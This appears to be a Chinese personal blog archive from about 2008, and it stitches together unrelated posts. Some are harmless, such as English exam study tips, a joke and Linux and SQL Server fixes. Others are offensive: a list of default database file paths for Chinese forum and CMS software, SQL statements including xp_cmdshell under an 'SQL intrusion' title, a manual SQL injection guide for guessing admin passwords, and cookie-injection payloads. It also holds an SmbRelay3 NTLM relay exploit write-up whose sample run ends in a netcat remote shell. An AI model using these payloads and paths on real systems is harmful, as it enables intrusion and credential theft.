▲首先词汇是基础,应该摆在六级准备的前头。没有词汇做基础,在进行阅读时很可能会一眼望去一大片的生词,只能读懂只言片语,从而影响正确理解,减慢进度。扩大词汇量其实是个日积月累的过程,要是时间紧迫的话,建议找一些词汇记忆软件1、奇迹英语智能记忆(http://ee.qjnet.net/ ),这套软件功能简捷,但我试过是国内众多背单词软件中效率最高的,是非常简捷高效的软件,2、敏特英语教室(www.minte.com.cn),这是风靡全国的网上学习记忆系统,价格贵了些但还值得,三、新东方背单词。感觉效率还可以,记忆效率与自己背词典效率差不多,有几个不错的单词测验游戏,但没有循环记忆安排。
▲词汇的背诵也有技巧,要注意词汇之间的比较和归类,,像priceless和 invaluable都表示“无价”,而valueless和worthless表示“‘毫无价值”;一些形近词也是考点,如considerate (考虑周到的)和 considerable(可观的);要掌握一些常见的词缀,如 post-表示“后面的”, eg.postwar(战后), anti-, counter一表示“反对,相对”。
▲很多同学反映在考场做听力时会十分的紧张,一个词一个词地听,生怕错过什么,进入大脑的却只是些单词而无法之理解整个句意,致使无法发挥正常水平。这里有个小窍门,考前一个月每晚睡觉前听十分钟的历年听力真题,甚至不需要用心去听,只要有意无意地听听(比如刷牙的时候),这样做的话,耳朵会适应它的语速和音调,一些语句会听起来很熟悉,在考场上对那些熟悉的语音自然就不会感觉很紧张。(很有效
▲事先阅读选项就不必说了,这里我要说的一个小技巧是,对于那些选项较长的,你可以用中文在旁边写上大意,(不必像翻译题一样对待,写几个关键词就可以,eg.He'd rathernot go to the lecture.写:不去听讲课。),选起来就一目了然,节省时间,为下一题作准备。
▲要是一道题你花了很长时间猜的话,那么千万不要再浪费时间!在没有听懂的情况下,靠猜,正确的概率是非常小的,而且在某一道题上远留太久会影响下一题,使自己处于被动地位,如此恶性循环卜去,会做得一塌糊涂。所以该放弃的题一定要放弃!
▲另外,记住要听关键词 key words,从语调判断说话人的态度,如讽刺,否定,惊讶等,还要注意与听力原文中有替换的也往往是答案,如原文中有“ It’s surprising that Tom came out of the accident alive.”答案选 Tom survived the accident.这里是 came out of和survived的同义替换。
  
▲一篇文章做下来,有时候自我感觉良好,把答案一对,觉得和想象的差很远。很多同学反映六级阅读比四级阅读难得多,就在于六级阅读选项里有很多细节题,选项之间区分不大,觉得模棱两可的,拿不准。我的建议是:不要自我臆断或是凭直觉而掉入陷阱,一定不要偷懒!要回去找原文!正确的答案往往是能在原文里找出确凿的依据的。

▲六级阅读不适合粗看一遍原文,再带着问题去search的方法,因为有很多细节题型,很可能因为错过一个关键词或关键句而掉入陷阱。相反,应该先仔细看一遍全文,再去看题,再回原文找,时间固然要多花些,但这样的话,你可以仔细地只做一遍,保证正确率,省去检查,众所周知,有时间回头检查的可能性不大,而且检查也有可能把原本选对的改错,所以我提倡做阅读一遍且仅一遍!
▲注意一些 key words如转折词,对把握作者的态度和找出主题句有关键作用。

▲写作其实是六级考试里比较容易突击的部分。因为大多题目是议论文,所以一定要掌握一些句型和衔接用的词组,如 on the whole, on one hand… on the other hand, as every coin has two sides, as the saying goes,掌握一些号召型的,推测型的,结论型的结尾。
▲注意使用的单词要有variety,包括用多个词表达一个意思或是采用词性的变化,如advantageous, beneficial, advisable, profitable之间可交替着用。 more valuable若用 of morevahe替代会更有神。加一些副词如greatly, inevitably,可以增强语气(也可以增加字数),像increase和increase steadily/remarkably/slightly表达出来的效果肯定不一样。
▲一篇好的作文一定要有一些闪光点,让判卷老师眼前一亮,有个好印象,可以使用一些“高级词汇”,比如不要反复用一些像 important这样初中就学了的,可以用 essential,crucial,indispensable等替代,当然,要是对一些单词的拼写不是很确定的话,宁愿不要去用这个词。闪光点也可以是一句虚拟语气,(同样,要是你没有把握写对时,也不要去铤而走险。)还可以引入一些名言谚语,恰好文部每期的四六级刊物里《智慧语丝》栏目里都有很多。寄托家园,网聚留学者的力量
▲字数要够,但不能为凑字数而加些不知其所以然的废话,这样反而给判卷老师留下很坏的印象。可以在内容上进行拓展,比如引入例证或深入探讨现象,对其进行预测或是说如果这一现象继续会带米什么后果,所以要号召大家共同努力制止这一现象等。检查,一定要检查!粗俗地过一遍很容易就能发现一些如时态上的小问题,这些小毛病也是也是很要命的!

考前要坚持统几篇,把握把握时间,再与范文作比较,找出范文的亮点,认真总结。
最后一点,基础+技巧+努力,自己的努力是最重要的,没有下功夫,一切技巧全部失效。
发帖者 时间: 没有评论:
标签:

2008年12月1日星期一

征婚

一位女子,开出征婚条件有两点
1.要帅
2.要有车
电脑去帮她搜寻 结果:象棋

这位女子,不服搜出的结果又输入
1.要有漂亮的房子
2.要有很多钱
电脑去帮她再次搜寻的结果:银行

此女子仍然不失望,继续输入条件
1要长得酷
2又要有安全感
结果搜出的结果是:奥特曼

此女子仍然不失望,还继续输入条件
1.要帅
2.要有车
3.要有漂亮的房子
4.要有很多钱
5要长得酷
6又要有安全感
电脑去帮她再次搜寻的结果:奥特曼在银行里下象棋
发帖者 时间: 没有评论:

BackTrack安装后的补充

来源:http://anonymous.blogbus.com

小知识:命令gui会进入KDE环境,命令guifast会进入Fluxbox环境

1. 首先是两个小工具leetmode(按F12自动弹出终端,很华丽),和yakuake(就是那个官方截图右侧上的那个很漂亮的信息显示),将它们加入自启动,终端执行

#cd /root/.kde/Autostart

#ln -s /usr/bin/leetmode leetmode

#ln -s /opt/kde/bin/yakuake yakuake

2. 修改reboot或shutdown时候会自动弹出CD的问题(LiveCD使用的时候这不是问题,但是在硬盘上使用的时候,这是个很大的问题..)

编辑/etc/rc.d/rc.6

# eject cdrom devices
. ./usr/lib/liblinuxlive
#echo "Ejecting all CDROMs..."
#list_cdrom_devices | while read DEVICE; do
# cdrecord dev=$DEVICE -eject >/dev/null 2>/dev/null
# can't use eject because it's not working with our kernel
# eject -s $DEVICE >/dev/null 2>/dev/null
#done
#echo "========================================"
echo "It's safe to switch the computer off now"
echo -ne "Press Enter to $command "

注释掉弹出那段就可以了

3. 修改root登陆之前的那个欢迎画面,就是显示登陆名和登录密码的地方(默认密码早被我改了,所以这个东西太碍眼了,干掉..)

编辑/etc/issue,把里面的东西全部删掉就行了,当然你也可以加上你喜欢的东西。

4. 这里属于个人喜好问题,可以略过

BackTrack的默认界面看着不舒服,自己又做了一个...感觉稍微好一点。

做张新图,覆盖/boot/splash.bmp,然后执行lilo更新

默认的splash

http://anonymous.blogbus.com/files/1154428755.gif

现在的splash

http://anonymous.blogbus.com/files/1154428384.gif
发帖者 时间: 没有评论:
标签: ,

BackTrack(BT3)、WIFIWAY启动黑屏问题解决办法

文章作者:我还没挂
原文出自:http://hi.baidu.com/westhack

如果你启动光盘或USB版BT、WIFIWAY时出现黑屏,请用以下几种方法:

1,选择启动方式后黑屏的可以在出现启动画面时选择BT3 Graphics mode (VESA KDE)后按TAB键,在最后面加上acpi=off 按回车,注意,要在这些文字之后加一个空格再输入这几个字符,还有一点也得注意,他们都是小写.如图1

选择BT3 Graphics mode (VESA KDE)是把分辨率设为1024*768,有些宽屏电脑可以选择BT3 Graphics mode (KDE)后按TAB键,最后面加入acpi=off 回车进入.也可以黑屏时按Fn+F8

2.输入startx后黑屏的可以先输入xconf在输入startx.

如还不能进入就第一步和第二步一起用

3.按以上步骤操作有可能问题就能解决.

我再提供几个xorg.conf文件,选择BT3 Graphics mode (VESA KDE)能进入XWINDOWS的和先输入xconf,再输入startx,进入的,都可以用这个xorg.conf文件,我主要将分辨率设在了 800*600 ,刷新率设在60Hz.,因为普通液晶显示器只支持60Hz.有了这几个模块,就不需要手动输入xconf了.

1.如果使用的是VM版本,xxx.lzm为要安装的模块,将其放到ROOT目录后执行

lzm2dir xxx.lzm /

注意命令行,在LZM后空格加 /

2.如果是U盘或光盘版,用UltraISO等工具,将xxx.lzm放入BT3/modules目录下,启动后会自动加载

http://www.btlinux.cn/files/bt3/xorg/xorg86.lzm

http://www.btlinux.cn/files/bt3/xorg/xorg.confao.lzm

http://www.btlinux.cn/files/bt3/xorg/xorg.conf.lzm 这个好像是david98做的

http://www.btlinux.cn/files/bt3/xorg/siliconmotion.xorg.conf.lzm 这个好像是minileaf做的

如不能下载请访问http://www.btlinux.cn/files/bt3/xorg/目标另存为或迅雷下载

这几个文件不可全用,选择其中一个有效的用,先用第一个在用第二个

附上其中一个/etc/X11下的xorg.conf文件内容:

Section "ServerLayout"
Identifier     "X.org Configured"
Screen      0  "Screen0" 0 0
InputDevice    "Mouse0" "CorePointer"
InputDevice    "Keyboard0" "CoreKeyboard"
EndSection

Section "Files"
RgbPath      "/usr/share/X11/rgb"
ModulePath   "/usr/lib/xorg/modules"
FontPath     "/usr/share/fonts/TTF"
FontPath     "/usr/share/fonts/OTF"
FontPath     "/usr/share/fonts/Type1"
FontPath     "/usr/share/fonts/misc"
FontPath     "/usr/share/fonts/75dpi/:unscaled"
EndSection

Section "Module"
Load  "GLcore"
Load  "dbe"
Load  "dri"
Load  "extmod"
Load  "glx"
Load  "record"
Load  "xtrap"
Load  "freetype"
Load  "type1"
EndSection

Section "InputDevice"
Identifier  "Keyboard0"
Driver      "kbd"
EndSection

Section "InputDevice"
Identifier  "Mouse0"
Driver      "mouse"
Option     "Protocol" "auto"
Option     "Device" "/dev/input/mice"
Option     "ZAxisMapping" "4 5 6 7"
EndSection

Section "Monitor"
Identifier   "Monitor0"
VendorName   "Monitor Vendor"
ModelName    "Monitor Model"
EndSection

Section "Device"
Identifier  "Card0"
Driver      "vmware"
VendorName  "VMware Inc"
BoardName   "[VMware SVGA II] PCI Display Adapter"
BusID       "PCI:0:15:0"
EndSection

Section "Screen"
Identifier "Screen0"
Device     "Card0"
Monitor    "Monitor0"
SubSection "Display"
Viewport   0 0
Depth     1
EndSubSection
SubSection "Display"
Viewport   0 0
Depth     4
EndSubSection
SubSection "Display"
Viewport   0 0
Depth     8
EndSubSection
SubSection "Display"
Viewport   0 0
Depth     15
EndSubSection
SubSection "Display"
Viewport   0 0
Depth     16
EndSubSection
SubSection "Display"
Viewport   0 0
Depth     24
EndSubSection
EndSection
发帖者 时间: 没有评论:
标签: , ,

2008年11月30日星期日

关于:以前的某个程序安装已在安装计算机上创建挂起的文件操作 解决办法

以前装过sql server,后来删掉。现在重装,却出现“以前的某个程序安装已在安装计算机上创建挂起的文件操作。运行安装程序之前必须重新启动计算机”错误。无法进行下去。

参考网上资料,总算搞定。步骤是:

1)添加/删除程序中彻底删除sql server。

2)将没有删除的sql server目录也删除掉。

3)打开注册表编辑器,在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager中找到PendingFileRenameOperations项目,并删除它。这样就可以清除安装暂挂项目。

4)删除注册表中跟sql server相关的键。

其实估计只要做第3步就可以搞定,这样就可以清除安装暂挂项目。自己是先走了1,2,4,最后做了3才搞定。所以估计3才是最关键的。
发帖者 时间: 没有评论:
标签: , ,

2008年11月29日星期六

各大数据库默认地址 Default Database Address

/data/dvbbs7.mdb 动网论坛数据库
/databackup/dvbbs7.mdb 动网论坛数据库
/bbs/databackup/dvbbs7.mdb 动网论坛数据库
/admin/data/qcdn_news.mdb 青创文章管理系统数据库
/data/qcdn_news.mdb 青创文章管理系统数据库
/firend.mdb 交友中心数据库
/database/NewCloud6.mdb 新云管理系统6.0数据库
/database/PowerEasy4.mdb 动易网站管理系统4.03数据库
/blogdata/L-BLOG.mdb L-BLOG v1.08数据库
/database/bbsxp.mdb BBSXP论坛数据库
/access/sf2.mdb 雪人论坛程序v2.0数据库
/data/Leadbbs.mdb LeadBBS论坛 v3.14数据库
/bbs/Data/LeadBBS.mdb LeadBBS论坛 v3.14数据库
/bbs/access/sf2.mdb 雪人论坛程序v2.0数据库
/bbs/database/bbsxp.mdb BBSXP论坛数据库
/blog/blogdata/L-BLOG.mdb L-BLOG v1.08数据库
/fdnews.asp 六合专用BBS数据库
/bbs/fdnews.asp 六合专用BBS数据库
/admin/ydxzdate.asa 雨点下载系统 v2.0+SP1数据库
/data/down.mdb 动感下载系统XP Ver2.0数据库
/database/Database.mdb 轩溪下载系统 v3.1数据库
/db/xzjddown.mdb lhdownXp 下载系统数据库
/data/db1.mdb 动感下载系统XP v1.3数据库
/db/play.asp 娱乐先锋论坛 v3.0数据库
/mdb.asp 惊云下载系统 v1.2数据库
/admin/data/user.asp 惊云下载系统 V3.0数据库
/data_jk/joekoe_data.asp 乔客6.0数据库
/data/news3000.asp 沸腾展望新闻系统 v1.1数据库
/data/appoen.mdb 惠信新闻系统4.0数据库
/data/12912.asp 飞龙文章管理系统 v2.1数据库
/database.asp 动感极品下载管理系统 v3.5
/download.mdb 华仔软件下载管理系统 v2.3
/data/zm_marry.asp 动网SP2美化版数据库
/dxxobbs/mdb/dxxobbs.mdb dxxobbs论坛数据库
/database\yiuwekdsodksldfslwifds.mdb动力文章系统数据库

/database/article.asp 贫龙文章管理系统
/data/dvbbs7.mdb 动网论坛数据库 7.X
/databackup/dvbbs7.mdb 动网论坛默认备份数据库 7.0-7.1
/data/dvbbs8.mdb 动网论坛数据库 8.0
/admin/data/qcdn_news.mdb 青创文章管理系统数据库
/data/qcdn_news.mdb 青创文章管理系统数据库
/firend.mdb 交友中心数据库
/database/NewCloud6.mdb 新云管理系统6.0数据库
/database/PowerEasy4.mdb 动易网站管理系统4.03数据库
/database/PowerEasy5.mdb 动易网站管理系统5.X数据库
/database/PowerEasy6.mdb 动易网站管理系统6X数据库
/database/PowerEasy2006.mdb 动易网站管理系统2006数据库
/blogdata/L-BLOG.mdb L-BLOG v1.08数据库
/database/bbsxp.mdb BBSXP论坛数据库
/access/sf2.mdb 雪人论坛程序v2.0数据库
/data/Leadbbs.mdb LeadBBS论坛 v3.14数据库
/bbs/Data/LeadBBS.mdb LeadBBS论坛 v3.14数据库
/bbs/access/sf2.mdb 雪人论坛程序v2.0数据库
/bbs/database/bbsxp.mdb BBSXP论坛数据库
/blog/blogdata/L-BLOG.mdb L-BLOG v1.08数据库
/fdnews.asp 六合专用BBS数据库
/bbs/fdnews.asp 六合专用BBS数据库
/admin/ydxzdate.asa 雨点下载系统 v2.0+SP1数据库
/data/down.mdb 动感下载系统XP Ver2.0数据库
/database/Database.mdb 轩溪下载系统 v3.1数据库
/db/xzjddown.mdb lhdownXp 下载系统数据库
/data/db1.mdb 动感下载系统XP v1.3数据库
/db/play.asp 娱乐先锋论坛 v3.0数据库
/mdb.asp 惊云下载系统 v1.2数据库
/admin/data/user.asp 惊云下载系统 V3.0数据库
/data_jk/joekoe_data.asp 乔客6.0数据库
/data/news3000.asp 沸腾展望新闻系统 v1.1数据库
/data/appoen.mdb 惠信新闻系统4.0数据库
/data/12912.asp 飞龙文章管理系统 v2.1数据库
/database.asp 动感极品下载管理系统 v3.5
/download.mdb 华仔软件下载管理系统 v2.3
/data/zm_marry.asp 动网SP2美化版数据库
/dxxobbs/mdb/dxxobbs.mdb dxxobbs论坛数据库


/register/userreg_setp2.asp科讯CMS注册可上传小马
upfile_photo.asp
Upfile_Soft.asp
upfile_flash.asp
powered by mypower
upfile_other.asp
data/scadata.mdb
/db/com02.mdb
/User/UserReg.asp

发帖者 时间: 没有评论:
标签:

SQL入侵必学语句大全

SELECT * FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="c:\test.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions
/*动态文件名
declare @fn varchar(20),@s varchar(1000)
set @fn = 'c:\test.xls'
set @s ='''Microsoft.Jet.OLEDB.4.0'',
''Data Source="'+@fn+'";User ID=Admin;Password=;Extended properties=Excel 5.0'''
set @s = 'SELECT * FROM OpenDataSource ($'">'+@s+')...sheet1$'
exec(@s)
*/

SELECT cast(cast(科目编号 as numeric(10,2)) as nvarchar(255))+' ' 转换后的别名
FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="c:\test.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions

/********************** EXCEL导到远程SQL
insert OPENDATASOURCE(
'SQLOLEDB',
'Data Source=远程ip;User ID=sa;Password=密码'
).库名.dbo.表名 (列名1,列名2)
SELECT 列名1,列名2
FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="c:\test.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions


/** 导入文本文件
EXEC master..xp_cmdshell 'bcp dbname..tablename in c:\DT.txt -c -Sservername -Usa -Ppassword'

/** 导出文本文件
EXEC master..xp_cmdshell 'bcp dbname..tablename out c:\DT.txt -c -Sservername -Usa -Ppassword'

EXEC master..xp_cmdshell 'bcp "Select * from dbname..tablename" queryout c:\DT.txt -c -Sservername -Usa -Ppassword'

导出到TXT文本,用逗号分开
exec master..xp_cmdshell 'bcp "库名..表名" out "d:\tt.txt" -c -t ,-U sa -P password'


BULK INSERT 库名..表名
FROM 'c:\test.txt'
WITH (
FIELDTERMINATOR = ';',
ROWTERMINATOR = '\n'
)


--/* dBase IV文件
select * from
OPENROWSET('MICROSOFT.JET.OLEDB.4.0'
,'dBase IV;HDR=NO;IMEX=2;DATABASE=C:\','select * from [客户资料4.dbf]')
--*/

--/* dBase III文件
select * from
OPENROWSET('MICROSOFT.JET.OLEDB.4.0'
,'dBase III;HDR=NO;IMEX=2;DATABASE=C:\','select * from [客户资料3.dbf]')
--*/

--/* FoxPro 数据库
select * from openrowset('MSDASQL',
'Driver=Microsoft Visual FoxPro Driver;SourceType=DBF;SourceDB=c:\',
'select * from [aa.DBF]')
--*/

/**************导入DBF文件****************/
select * from openrowset('MSDASQL',
'Driver=Microsoft Visual FoxPro Driver;
SourceDB=e:\VFP98\data;
SourceType=DBF',
'select * from customer where country != "USA" order by country')
go
/***************** 导出到DBF ***************/
如果要导出数据到已经生成结构(即现存的)FOXPRO表中,可以直接用下面的SQL语句

insert into openrowset('MSDASQL',
'Driver=Microsoft Visual FoxPro Driver;SourceType=DBF;SourceDB=c:\',
'select * from [aa.DBF]')
select * from 表

说明:
SourceDB=c:\ 指定foxpro表所在的文件夹
aa.DBF 指定foxpro表的文件名.


/*************导出到Access********************/
insert into openrowset('Microsoft.Jet.OLEDB.4.0',
'x:\A.mdb';'admin';'',A表) select * from 数据库名..B表

/*************导入Access********************/
insert into B表 selet * from openrowset('Microsoft.Jet.OLEDB.4.0',
'x:\A.mdb';'admin';'',A表)

文件名为参数
declare @fname varchar(20)
set @fname = 'd:\test.mdb'
exec('SELECT a.* FROM opendatasource(''Microsoft.Jet.OLEDB.4.0'',
'''+@fname+''';''admin'';'''', topics) as a ')

SELECT *
FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="f:\northwind.mdb";Jet OLEDB:Database Password=123;User ID=Admin;Password=;')...产品

********************* 导入 xml 文件

DECLARE @idoc int
DECLARE @doc varchar(1000)
--sample XML document
SET @doc ='



Customer was very satisfied




Important
Happy Customer.




'
-- Create an internal representation of the XML document.
EXEC sp_xml_preparedocument @idoc OUTPUT, @doc

-- Execute a SELECT statement using OPENXML rowset provider.
SELECT *
FROM OPENXML (@idoc, '/root/Customer/Order', 1)
WITH (oid char(5),
amount float,
comment ntext 'text()')
EXEC sp_xml_removedocument @idoc


???????

/**********************Excel导到Txt****************************************/
想用
select * into opendatasource(...) from opendatasource(...)
实现将一个Excel文件内容导入到一个文本文件

假设Excel中有两列,第一列为姓名,第二列为很行帐号(16位)
且银行帐号导出到文本文件后分两部分,前8位和后8位分开。


邹健:
如果要用你上面的语句插入的话,文本文件必须存在,而且有一行:姓名,银行账号1,银行账号2
然后就可以用下面的语句进行插入
注意文件名和目录根据你的实际情况进行修改.

insert into
opendatasource('MICROSOFT.JET.OLEDB.4.0'
,'Text;HDR=Yes;DATABASE=C:\'
)...[aa#txt]
--,aa#txt)
--*/
select 姓名,银行账号1=left(银行账号,8),银行账号2=right(银行账号,8)
from
opendatasource('MICROSOFT.JET.OLEDB.4.0'
,'Excel 5.0;HDR=YES;IMEX=2;DATABASE=c:\a.xls'
--,Sheet1$)
)...[Sheet1$]


如果你想直接插入并生成文本文件,就要用bcp

declare @sql varchar(8000),@tbname varchar(50)

--首先将excel表内容导入到一个全局临时表
select @tbname='[##temp'+cast(newid() as varchar(40))+']'
,@sql='select 姓名,银行账号1=left(银行账号,8),银行账号2=right(银行账号,8)
into '+@tbname+' from
opendatasource(''MICROSOFT.JET.OLEDB.4.0''
,''Excel 5.0;HDR=YES;IMEX=2;DATABASE=c:\a.xls''
)...[Sheet1$]'
exec(@sql)

--然后用bcp从全局临时表导出到文本文件
set @sql='bcp "'+@tbname+'" out "c:\aa.txt" /S"(local)" /P"" /c'
exec master..xp_cmdshell @sql

--删除临时表
exec('drop table '+@tbname)
/********************导整个数据库*********************************************/

用bcp实现的存储过程


/*
实现数据导入/导出的存储过程
根据不同的参数,可以实现导入/导出整个数据库/单个表
调用示例:
--导出调用示例
----导出单个表
exec file2table 'zj','','','xzkh_sa..地区资料','c:\zj.txt',1
----导出整个数据库
exec file2table 'zj','','','xzkh_sa','C:\docman',1

--导入调用示例
----导入单个表
exec file2table 'zj','','','xzkh_sa..地区资料','c:\zj.txt',0
----导入整个数据库
exec file2table 'zj','','','xzkh_sa','C:\docman',0

*/
if exists(select 1 from sysobjects where name='File2Table' and objectproperty(id,'IsProcedure')=1)
drop procedure File2Table
go
create procedure File2Table
@servername varchar(200) --服务器名
,@username varchar(200) --用户名,如果用NT验证方式,则为空''
,@password varchar(200) --密码
,@tbname varchar(500) --数据库.dbo.表名,如果不指定:.dbo.表名,则导出数据库的所有用户表
,@filename varchar(1000) --导入/导出路径/文件名,如果@tbname参数指明是导出整个数据库,则这个
参数是文件存放路径,文件名自动用
表名.txt
,@isout bit --1为导出,0为导入
as
declare @sql varchar(8000)

if @tbname like '%.%.%' --如果指定了表名,则直接导出单个表
begin
set @sql='bcp '+@tbname
+case when @isout=1 then ' out ' else ' in ' end
+' "'+@filename+'" /w'
+' /S '+@servername
+case when isnull(@username,'')='' then '' else ' /U '+@username end
+' /P '+isnull(@password,'')
exec master..xp_cmdshell @sql
end
else
begin --导出整个数据库,定义游标,取出所有的用户表
declare @m_tbname varchar(250)
if right(@filename,1)<>'\' set @filename=@filename+'\'

set @m_tbname='declare #tb cursor for select name from '+@tbname+'..sysobjects where xtype=''U'''
exec(@m_tbname)
open #tb
fetch next from #tb into @m_tbname
while @@fetch_status=0
begin
set @sql='bcp '+@tbname+'..'+@m_tbname
+case when @isout=1 then ' out ' else ' in ' end
+' "'+@filename+@m_tbname+'.txt " /w'
+' /S '+@servername
+case when isnull(@username,'')='' then '' else ' /U '+@username end
+' /P '+isnull(@password,'')
exec master..xp_cmdshell @sql
fetch next from #tb into @m_tbname
end
close #tb
deallocate #tb
end
go

/************* Oracle **************/
EXEC sp_addlinkedserver 'OracleSvr',
'Oracle 7.3',
'MSDAORA',
'ORCLDB'
GO

delete from openquery(mailser,'select * from yulin')

select * from openquery(mailser,'select * from yulin')

update openquery(mailser,'select * from yulin where id=15')set disorder=555,catago=888

insert into openquery(mailser,'select disorder,catago from yulin')values(333,777)


补充:

对于用bcp导出,是没有字段名的.

用openrowset导出,需要事先建好表.

用openrowset导入,除ACCESS及EXCEL外,均不支持非本机数据导入

发帖者 时间: 没有评论:
标签:

手工注入猜解语句

自己在学习过程中总结的一些东西,在这发出来,希望对看到的人能有所帮助吧!
猜解表名:
and exists (select * from 表名)
猜解列名:
and exists (select 字段 from 表名)
UNION法:
联合查询:
select name,password,id from user union select user,pwd,uid from
爆指定表名内容:
and 1=1 union select 1,2,3,4,5 from 表名
ASCII逐字解码法:
1、猜解列长度
猜解语句:
and (select top 1 len(列名)from 表名)>N
and (select top 1 len(列名)from 表名)=N
其中N是数字,变换这个N的值猜解列长度,例如:
and (select top 1 len(列名)from 表名)>1
and (select top 1 len(列名)from 表名)>6
如果一直猜到6都显示正常页面,猜到7的时候返回错误(大于6并且小于等于7),那么该列的长度为7。因为“top 1”的意思是把最靠前的1条记录给提取出来,所以如果要猜解第二条记录就该使用:
select top 1 len(列名) from 表名
where 列名 not in (select top 1 列名 from 表名)
2、ASCII码分析法猜解用户和密码
ASC()函数和Mid函数
例如:mid(列名,N,1)
ASC(mdi(列名,N,1))得到“列名”第N位字符ASCII码
猜解语句为:
and (select top 1 asc(mid(字段,1,1)) from 数据库名)=ASC码(通过转换工具换)
区间判断语句:
“......between......and......”
中文处理法:
当ASCII转换后为“负数”使用abs()函数取绝对值。
例:and (select top 1 abs(asc(mid(字段,1,1))) from 数据库名)=ASC码(通过转换工具换)
ASCII逐字解码法的应用:
1、猜解表名:
and (select count(*) from admin)<>0
2、猜解列名:
and (select count(列名) from 表名)<>0
3、猜解管理员用户个数:
and (select count(*) from 表名)=1
返回正常,表中有一条记录。
4、猜解管理员用户名的长度:
and (select len(列名) from 表名)>=1、>=2、>=3、>=4。
5、猜解管理员用户名:
and (select count(*)from 表名 where (asc(mid(列名,1,1))) between 30 and 130)<>0
最后提交:
and (select asc(mid(列名,1,1)) from 表名)=ascii的值
6、猜解管理员的密码:
按照上面的原理,只要把上面的语句中(asc(mid(列名,1,1)的列名换成PASSWORD就能得到管理员的密码了。
搜索型注入漏洞利用猜解语句:
关键字%' and 1=1 and '%'='%
关键字%' and 1=2 and '%'='%
将and 1=1 换成注入语句就可以了。

cookie注入语句:
javascript:alert(document.cookie="id="+escape("44 and 1=1"));
javascript:alert(document.cookie="id="+escape("44 and 1=2"));
猜解语句:
猜解长度:
javascript:alert(document.cookie="id="+escape("44 and (select len(password) from admin)=16"))
猜解内容:
javascript:alert(document.cookie="id="+escape("44 and (select asc(mid(username)) from admin)=97"))
发帖者 时间: 没有评论:
标签: , ,

2008年11月28日星期五

MS08-068 Exploit

Introduction

Most Windows networks still support insecure authentication schemes by default. This is for example what happends with NTLM who is enable by default until lastest Windows Vista.

NTLM allows users to reply incomming connections against third part systems, and authenticate themselves without knowing the password. Therefore, connecting to a system with NTLM means that you can be owned.

This authentication scheme is used on a variety of protocols, like HTTP. There is also a windows feature that allows your internet browser (iexplore) or the system (explorer) to automatically send your credentials against a network server if the server requires authentication.

If you are able to force remote users to connect to your system (HTTP or SMB) with dns attacks (poisoning,..), social engineering, email link, msn http link, xss, shutting down valid servers and getting the server ip address, or deploying some kind of malicous payload theorically, the network belongs to you. To exploit those security flaws, we have developed a new security tool named SmbRelay 3 that at this time is able to relay both HTTP and SMB authentication.

Smbrelay3 is the first public tool that allows those kinds of attacks. This version also includes an small SMB library for creating crafted messages so, if the incomming connection has Administrative privileges on the client computer, you will automatically get a shell.





Currently the following attacks are implemented:

* HTTP to SMB: Negotiate authentication with an HTTP client and relay credentials to another smb host.

* SMB to SMB: Negotiate authentication with an SMB computer and relay credentials to another windows computer.

* IMAP to SMB: Negotiate authentication with an email IMAP client and relay credentials to another host.

* POP3 to SMB: Negotiate authentication with an email POP3 client and relay credentials to another host.

* SMTP to SMB: Negotiate authentication with an email SMTP client SMB computer and relay credentials.

* Psexec Module: If you already know username and password you can get a shell to the remote computer. This psexec like tool works under win32 and linux as do not use Microsoft API.

* Fake interface:Under linux, a new port 445 binding is done under a different ip address. All packets sent to that interface will be replayed to the previously authenticated system.



Details

If gathered credentials have administration privileges on the target system, under those scenarios you will automatically get a remote shell to the target system. There are also two additional features:

To allow the user to automatically get a remote shell smbrelay needs to send raw smb messages to the SMB server. Thats why smbrelay3 implements its own smb library for creating special crafted packets.





Smbrelay is able to send the following smb requests:

#define SMBCLOSE 0x04
#define SERVICEOPERATION 0x25
#define READANDX 0x2e
#define WRITEANDX 0x2f
#define FINDFIRST2 0x32
#define SESSIONSETUPANDX 0x73
#define TREECONNETANDX 0x75
#define NTCREATEANDX 0xa2

For more information just read the readme file


Attack Example:

C:\smbrelay3>smbrelay3.exe --ListForHTTPRequests --AlternativeHTTPPort 81

SmbRelay3 - SMB to SMB and HTTP to SMB replay attack
(c) 2007 - 2008 Andres Tarasco - atarasco@gmail.com
Website: http://www.tarasco.org

Listening HTTP thread at port 81
Accepted Connection - Replaying against 192.168.1.2
Read First HTTP Request...
Sending Default HTTP 401 Error response and asking for authentiation NTLM
Read Second HTTP Request with Auhorization Header..
Init HTTP to SMB attack - Connecting with: 192.168.1.2:445
Sending SMB Authentication Handshake
Received SMB Message with NTLM v2 packet
Sending NTLM Challenge from SMB Server to the HTTP Client
Received Final Authentication packet from remote HTTP Client
UserName: Administrator
DomainName: 192.168.1.36
WorkstationName: SERVIDOR
Trying to authenticate to remote SMB as Administrator
Sending Final SMB Authentication packet with NTLM Message type 3
SessionSetupAndX Completed
Authenticacion against 192.168.1.2 Succeed with username Administrator
Connecting against IPC$
Trying to connect to admin$
Creating Remote File smrs.exe under admin$
Writing File smrs.exe into admin$
Closing File handle - FID: 800f
Opening Remote Service Control Manager pipe \svcctl
Sending RPC BindRequest to SCM pipe
Reading Response from Binding Request
Opening Remote Service Control Manager
Creating Remote Service
Opening Remote Service
Starting Remote Service...
Now Remote Service is executed... Try to connect to 192.168.1.2:8080

C:\smbrelay3>nc 192.168.1.2 8080
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>


Special thanks goes to Iñaki Lopez for developing the NTLM library.


Update Microsoft has released MS08-068 limitating this vulnerability to be exploited only against the same workstation and under the same protocol. Enjoy :)



+ Download (Windows executable + Source code)
+ Browse source code online
+ Paper Download Spanish Paper (Presented at Lac0n security congress)
发帖者 时间: 没有评论:
标签: , , ,

成功绕过XP登陆密码

有许多朋友还在为忘记XP登陆密码不能进入系统而烦恼,现在我就来给你带来解决的方法.
所需工具
1.U盘一个
2.Usboot(U盘启动制作软件)
3.winrar(压缩软件)
